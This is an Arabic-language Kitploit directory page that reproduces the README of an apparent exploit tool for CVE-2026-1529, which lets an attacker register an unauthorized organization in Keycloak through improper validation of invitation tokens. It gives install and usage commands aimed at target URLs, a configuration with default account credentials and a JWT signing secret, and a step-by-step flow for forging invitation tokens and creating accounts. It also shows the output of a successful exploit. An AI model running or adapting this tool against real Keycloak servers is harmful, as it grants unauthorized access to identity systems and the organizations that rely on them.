Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1529 — Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة | Kitploit
أدوات/GitHubGitHub/0x240x23elu/cve-2026-1529
المصادقة والترخيصتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة

عرض المستودع
32منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال ثغرة CVE-2026-1529 في Keycloak

Python Version License Status

CVE-2026-1529: Keycloak - تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة

⚠️ تحذير: هذه الأداة مخصصة لأغراض الاختبار الأمني التعليمي والمصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

📋 جدول المحتويات

  • نظرة عامة
  • الميزات
  • المتطلبات الأساسية
  • التثبيت
  • الاستخدام
  • الإعدادات
  • كيفية العمل
  • المخرجات
  • استكشاف الأخطاء وإصلاحها
  • إخلاء المسؤولية القانوني
  • المساهمة
  • الاعتمادات

🎯 نظرة عامة

توضح هذه الأداة ثغرة أمنية حرجة في Keycloak (CVE-2026-1529) تسمح بتسجيل مؤسسة غير مصرح به من خلال التحقق غير السليم من رمز دعوة JWT. يقوم الاستغلال بالتلاعب برموز الدعوة للحصول على وصول غير مصرح به إلى مثيلات Keycloak.

تفاصيل الثغرة:

  • معرف CVE: CVE-2026-1529
  • الخطورة: حرجة
  • متجه الهجوم: الشبكة
  • تعقيد الهجوم: منخفض
  • الأنظمة المتأثرة: مثيلات Keycloak مع ميزة دعوة المؤسسات

✨ الميزات

  • ✅ اكتشاف تلقائي للثغرات
  • ✅ التلاعب برموز JWT
  • ✅ تسجيل مستخدم تلقائي
  • ✅ التحقق من تسجيل الدخول
  • ✅ تقارير استغلال مفصلة
  • ✅ معلمات قابلة للتكوين
  • ✅ دعم تسجيل التصحيح
  • ✅ عميل HTTP متعدد المحاولات

📦 المتطلبات الأساسية

  • Python 3.7 أو أحدث
  • pip (مدير حزم Python)
  • بيئة افتراضية (موصى بها)
  • مثيل Keycloak مستهدف (لأغراض الاختبار المصرح به فقط)

🚀 التثبيت

الطريقة 1: استنساخ المستودع

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate  # على Windows: venv\Scripts\activate

# تثبيت التبعيات
pip install -r requirements.txt

الطريقة 2: الإعداد اليدوي

root@kitploit:~
# إنشاء هيكل الدليل
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# تنزيل الملفات من الإصدارات أو نسخها يدويًا
# ثم تثبيت التبعيات
pip install requests urllib3 PyJWT

هيكل الملفات

root@kitploit:~
keycloak-exploit/
├── keycloak-exploit.py           # سكربت الاستغلال الرئيسي
├── requirements.txt              # تبعيات Python
├── README.md                     # هذا الملف
├── config/
│   └── default_config.json       # ملف الإعدادات
├── utils/
│   ├── __init__.py              # مُهيئ الحزمة
│   ├── http_utils.py            # أدوات عميل HTTP
│   ├── jwt_utils.py             # التلاعب بـ JWT
│   └── crypto_utils.py          # أدوات التشفير
├── logs/                         # سجلات مولدة تلقائيًا
└── output/
    └── reports/                  # تقارير الاستغلال

💻 الاستخدام

الاستخدام الأساسي

root@kitploit:~
python3 keycloak-exploit.py https://target-keycloak.com

الخيارات المتقدمة

root@kitploit:~
# مع رمز دعوة مخصص
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# مع معرف مؤسسة مخصص
python3 keycloak-exploit.py -o custom_org_id https://target.com

# مع ملف إعدادات مخصص
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# تفعيل تسجيل التصحيح
python3 keycloak-exploit.py -d https://target.com

# عرض المساعدة
python3 keycloak-exploit.py -h

# عرض الإصدار
python3 keycloak-exploit.py -v

وسائط سطر الأوامر

⚙️ الإعدادات

قم بتحرير config/default_config.json لتخصيص معلمات الاستغلال:

root@kitploit:~
{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

خيارات الإعدادات

🔧 كيفية العمل

يعمل الاستغلال بالخطوات التالية:

  1. فحص الثغرة

    • الاتصال بمثيل Keycloak المستهدف
    • اكتشاف إصدار Keycloak
    • اختبار نقاط نهاية المؤسسات
  2. توليد/التلاعب بالرمز

    • توليد أو قبول رمز الدعوة
    • فك تشفير رمز JWT
    • التلاعب بمعرف المؤسسة في الحمولة
    • إعادة توقيع الرمز بمفتاح معروف
  3. تسجيل المستخدم

    • إرسال التسجيل بالرمز المتلاعب به
    • تجاوز التحقق من المؤسسة
    • إنشاء حساب مستخدم غير مصرح به
  4. التحقق من تسجيل الدخول

    • اختبار تسجيل الدخول ببيانات الاعتماد المُنشأة
    • توليد رمز الوصول
    • توفير رابط تسجيل الدخول
  5. توليد التقرير

    • إنشاء تقرير استغلال مفصل
    • الحفظ في output/reports/
    • يتضمن جميع التفاصيل الفنية

مخطط تدفق الهجوم

root@kitploit:~
┌─────────────────┐
│  فحص الهدف      │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  توليد/الحصول   │
│  على الرمز      │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ التلاعب بالرمز  │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ تسجيل المستخدم  │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ اختبار الدخول   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ توليد التقرير   │
└─────────────────┘

📊 المخرجات

مخرجات الاستغلال الناجح

root@kitploit:~
============================================================
نتائج استغلال CVE-2026-1529
============================================================
✓ الهدف عرضة لثغرة CVE-2026-1529

🎯 الاستغلال ناجح!
اسم المستخدم: admin_user_2026
كلمة المرور: KeycloakCVE2026!
البريد الإلكتروني: [email protected]
رابط تسجيل الدخول: https://target.com/realms/master/account

📄 تم حفظ التقرير في: output/reports/exploit_report_20260211_050507.txt

🔐 استخدم بيانات الاعتماد المقدمة للوصول إلى مثيل Keycloak!
⚠️ هذا يوضح الوصول غير المصرح به بسبب CVE-2026-1529

============================================================
بواسطة f3ds cr3w est, 2002
============================================================

التقرير المُنشأ

يتم حفظ تقرير مفصل في output/reports/ يتضمن:

  • معلومات الهدف
  • نتائج الاستغلال لكل خطوة
  • بيانات اعتماد المستخدم المُنشأ
  • رابط تسجيل الدخول
  • الرموز الأصلية والمتلاعب بها
  • التفاصيل الفنية
  • معلومات CVE
  • التوصية الأمنية

ملفات السجل

يتم حفظ السجلات في دليل logs/ مع معلومات تنفيذ مفصلة.

🐛 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

1. ModuleNotFoundError: No module named 'utils'

الحل:

root@kitploit:~
# تأكد من أنك في الدليل الصحيح
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com

2. ملف الإعدادات غير موجود

الحل:

root@kitploit:~
# تأكد من وجود دليل config
mkdir -p config
# انسخ أو أنشئ default_config.json في config/

3. Retry.init() got an unexpected keyword argument 'method_whitelist'

الحل: تم إصلاح هذا في أحدث إصدار. قم بتحديث urllib3:

root@kitploit:~
pip install --upgrade urllib3

4. الهدف غير عرضة للثغرة

الأسباب المحتملة:

  • الهدف ليس مثيل Keycloak
  • Keycloak غير قابل للوصول
  • ميزة المؤسسات معطلة
  • الهدف تم تحديثه ضد CVE-2026-1529

الحل:

root@kitploit:~
# تفعيل تسجيل التصحيح لرؤية المزيد من التفاصيل
python3 keycloak-exploit.py -d https://target.com

5. انتهاء مهلة الاتصال

الحل:

root@kitploit:~
# زيادة المهلة في config/default_config.json
"timeout": 60

وضع التصحيح

قم بتفعيل التسجيل التفصيلي لاستكشاف المشكلات:

root@kitploit:~
python3 keycloak-exploit.py -d https://target.com

سيظهر هذا:

  • طلبات/استجابات HTTP مفصلة
  • خطوات التلاعب بالرمز
  • محاولات التسجيل
  • تتبعات الأخطاء الكاملة

📜 إخلاء المسؤولية القانوني

root@kitploit:~
⚠️ إشعار قانوني مهم ⚠️

هذه الأداة مقدمة لأغراض الاختبار الأمني التعليمي والمصرح به فقط.

باستخدام هذه الأداة، فإنك توافق على أن:

1. ستستخدم هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح
   لاختبارها.

2. تدرك أن الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
   بموجب القوانين بما في ذلك على سبيل المثال لا الحصر:
   - قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) - الولايات المتحدة
   - قانون إساءة استخدام الكمبيوتر - المملكة المتحدة
   - تشريعات مماثلة في البلدان الأخرى

3. تتحمل المسؤولية الكاملة عن أي عواقب لاستخدام هذه الأداة.

4. المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر
   ناتج عن هذه الأداة.

5. هذه الأداة مقدمة "كما هي" دون أي ضمان من أي نوع.

استخدم على مسؤوليتك الخاصة. الوصول غير المصرح به جريمة.

🤝 المساهمة

المساهمات مرحب بها! يرجى اتباع هذه الإرشادات:

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع ميزة (git checkout -b feature/improvement)
  3. قم بتسجيل تغييراتك (git commit -am 'Add new feature')
  4. ادفع إلى الفرع (git push origin feature/improvement)
  5. أنشئ طلب سحب

إعداد التطوير

root@kitploit:~
# استنساخ نسختك
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate

# تثبيت التبعيات
pip install -r requirements.txt

# قم بتغييراتك واختبرها
python3 keycloak-exploit.py https://test-target.com

نمط الكود

  • اتبع إرشادات PEP 8
  • أضف docstrings للدوال
  • قم بتضمين تلميحات الأنواع حيثما أمكن
  • اكتب رسائل تسجيل وصفية

🏆 الاعتمادات

تم الإنشاء بواسطة: f3ds cr3w est, 2002

التبعيات

  • requests - مكتبة HTTP
  • urllib3 - عميل HTTP
  • PyJWT - تنفيذ JWT

📝 سجل الإصدارات

v1.0.0 (2026-02-11)

  • الإصدار الأولي
  • تنفيذ استغلال CVE-2026-1529
  • التلاعب برموز JWT
  • تسجيل مستخدم تلقائي
  • توليد التقارير
  • دعم تسجيل التصحيح

🔗 الموارد

  • تفاصيل CVE-2026-1529
  • توثيق Keycloak
  • أفضل ممارسات JWT
  • دليل اختبار OWASP

📧 الاتصال

للاستفسارات أو المشكلات أو المخاوف الأمنية:

  • افتح مشكلة على GitHub
  • الاتصال: [[email protected]]
  • المشكلات الأمنية: أبلغ بشكل خاص

تذكر: مارس دائمًا الإفصاح المسؤول والأخلاقيات في الاختراق. Ref: https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation صُنع بـ ❤️ بواسطة f3ds cr3w est, 2002

تنزيل الأداة
الوسيطالاختصارالوصف
target-عنوان URL المستهدف لـ Keycloak (مطلوب)
--token-tرمز دعوة مخصص
--org-id-oمعرف مؤسسة مخصص
--config-cمسار ملف الإعدادات
--debug-dتفعيل تسجيل التصحيح
--version-vعرض معلومات الإصدار
--help-hعرض رسالة المساعدة
القسمالمعلمةالوصفالافتراضي
exploitdefault_usernameاسم المستخدم للتسجيلadmin_user_2026
exploitdefault_passwordكلمة المرور للتسجيلKeycloakCVE2026!
exploitdefault_emailالبريد الإلكتروني للتسجيل[email protected]
exploittimeoutمهلة طلب HTTP (بالثواني)30
exploitmax_retriesالحد الأقصى لمحاولات HTTP3
jwtalgorithmخوارزمية توقيع JWTHS256
jwtsecret_keyالمفتاح السري لـ JWTمخصص
jwttoken_expiryانتهاء صلاحية الرمز (بالثواني)3600